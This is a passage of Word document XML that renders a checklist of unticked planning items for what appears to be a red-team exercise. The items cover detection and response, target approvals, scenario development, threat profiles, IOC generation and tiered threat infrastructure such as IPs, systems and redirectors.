    <w:p w14:paraId="6F0188A6" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>☐</w:t>
      </w:r>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> Detect</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E42F8F" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>☐</w:t>
      </w:r>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> Respond</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5501401D" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>☐</w:t>
      </w:r>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> Restore</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C057719" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>☐</w:t>
      </w:r>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> Target Restrictions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68B6B666" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>☐</w:t>
      </w:r>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> Target Infrastructure / Asset verification / Approvals</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4480495C" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>☐</w:t>
      </w:r>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> Scenario Development</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="088B3441" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>☐</w:t>
      </w:r>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> Operational Impact planning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F604F51" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>☐</w:t>
      </w:r>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> Develop threat profiles</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CCFCEFD" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>☐</w:t>
      </w:r>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> Network and Host Activity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B447D5B" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>☐</w:t>
      </w:r>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> IOC Generation (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>incl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> subsequent Analysis) and Management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D89BD70" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>☐</w:t>
      </w:r>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> Plan threat infrastructure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18354011" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>☐</w:t>
      </w:r>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> Tier 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE77F80" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>☐</w:t>
      </w:r>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> IPs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45133B99" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>☐</w:t>
      </w:r>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> Systems</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE23E38" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>☐</w:t>
      </w:r>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> Redirectors</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B799175" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>☐</w:t>
      </w:r>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> PPS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41CE084D" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>☐</w:t>
      </w:r>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> Tier 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="182140CD" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>☐</w:t>
      </w:r>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> IPs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EBFAF3F" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>☐</w:t>
      </w:r>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> Systems</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB2D543" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>☐</w:t>
      </w:r>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> Redirectors</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29AC28DC" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>☐</w:t>
      </w:r>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> PPS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA83844" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>☐</w:t>
      </w:r>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> Tier 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C837951" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
